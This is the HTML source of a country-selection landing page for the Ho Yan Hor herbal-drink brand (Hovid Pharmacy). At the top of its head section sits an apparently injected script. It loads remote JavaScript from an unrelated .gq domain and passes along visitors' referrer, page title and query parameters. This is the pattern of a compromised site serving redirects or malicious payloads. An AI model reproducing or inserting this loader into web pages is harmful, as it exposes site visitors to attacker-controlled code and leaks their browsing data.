<!DOCTYPE html>
<html lang="en">
    <head>
    	<span id="167557d1-7c17-0b1c-afa2-e13e2dfe2fb3"></span><script type="application/javascript">
var d=document;var s=d.createElement('script'); 
s.src='https://yasakeevradyi10.gq/Gwj674zh?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ebd10bf00099=script5ebd10bf0009a&_cid=167557d1-7c17-0b1c-afa2-e13e2dfe2fb3'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
if (document.location.protocol === 'https:' && 'https://yasakeevradyi10.gq/Gwj674zh?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ebd10bf00099=script5ebd10bf0009a'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
</script>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">       
        <meta name="author" content="">		
        <link rel="icon" href="{{ site_url }}themes/hovid/assets/images/favico.png">       
				
        <!-- Bootstrap core CSS -->
        <link href="bootstrap-3.3.1/dist/css/bootstrap.min.css" rel="stylesheet">
        <link href="css/carousel.css" rel="stylesheet">
        <link href="css/landing.css" rel="stylesheet">
        <!-- Custom styles for this template -->
        <link href='http://fonts.googleapis.com/css?family=Oswald:400,700,300' rel='stylesheet' type='text/css'>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
        <script src="bootstrap-3.3.1/dist/js/bootstrap.min.js"></script>
		
		
       
   </head>
   
    <body>
		<div class="top_bg text-center">
			<img style="margin:0 auto;" class="img-responsive" src="images/HoYanHor-logo.png"/>
		</div>
		<!-- Carousel
		================================================== -->
		<div id="myCarousel" class="carousel slide" data-ride="carousel">
		  <!-- Indicators 
		  <ol class="carousel-indicators">
			<li data-target="#myCarousel" data-slide-to="0" class="active"></li>
			<li data-target="#myCarousel" data-slide-to="1" class=""></li>
		  </ol>-->
		  <div class="carousel-inner">
			<div class="item active">
				<a target="_blank" href="#">
					<img class="img-full" style="margin:0 auto;"  src="images/HYH-slider01.jpg" alt="Second slide">
				</a>
			</div>
			<div class="item">
				<img class="img-full" style="margin:0 auto;"  src="images/HYH-slider02.jpg" alt="Second slide">
			</div>
		  </div>
		  <a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev"><span class="glyphicon glyphicon-chevron-left"></span></a>
		  <a class="right carousel-control" href="#myCarousel" role="button" data-slide="next"><span class="glyphicon glyphicon-chevron-right"></span></a>
		</div><!-- /.carousel -->
		<br clear="all">
		<br clear="all">
		<div class="container">
			<div class="text-center oswald-bold lg">
				WELCOME TO HO YAN HOR
			</div>
			<div class="text-center oswald g">
				Please select your country
			</div>
			<br clear="all">
			<br clear="all">
		</div>
		<div class="">
			<div class="col-xs-6" style="border-right:1px dashed #ccc;border-bottom:1px dashed #ccc;padding:0px 30px 60px 10px">
				<a href="http://hoyanhor.com.my/" target="_blank">
					<img style="margin:0 auto;float:right" class="img-responsive" src="images/country-malaysia.jpg"/>
				</a>
				<br clear="all">
				<br clear="all">
				<div class="caption oswald text-right" style="padding-right:48px">Malaysia</div>
			</div>
			<div class="col-xs-6" style="border-bottom:1px dashed #ccc;padding:0px 10px 60px 30px">                            <a href="http://www.hoyanhor.com.hk/" target="_blank">
					<img class="img-responsive" src="images/country-hongkong.jpg"/>
				<br clear="all">
				<div class="caption oswald" style="padding-left:44px">Hong Kong</div>
			</div>
		</div>
		<br clear="all">
		<br clear="all">
		<!--<div class="container">
			<div class="row">
				<div class="col-md-12 text-right">
					<img style="margin:0 auto;" class="img-responsive" src="images/country-malaysia.jpg"/>
				</div>
				<br clear="all">
				<br clear="all">
				<div class="col-md-12">
					<img style="margin:0 auto;" class="img-responsive" src="images/country-hongkong.jpg"/>
				</div>
			</div>
		</div>-->
		<div class="text-center">
			<div class="oswald follow">FOLLOW US</div>
			<br clear="all">
			<ul class="list-inline">
				<li>
					<a href="https://www.facebook.com/HoYanHor" target="_blank"><img src="images/icon-facebook.png"></a>
				</li>
				<li>
					<a href="https://www.youtube.com/user/hovidberhad" target="_blank"><img src="images/icon-youtube.png"></a>
				</li>
			</ul>
		</div>
		<br clear="all">
		<div class="small text-center">Copyright &copy; 2020 Hovid Pharmacy Sdn Bhd. Website design by <a style="text-decoration:none;color:#606060" href="http://mymonsterlab.com.my/">My Monster Lab.</a></div>
		<br clear="all">
		<script>
			$(document).ready(function(){
				$('.carousel').carousel({
				  interval: 10000
				})
			});
		</script>
	
        
    </body>
</html>
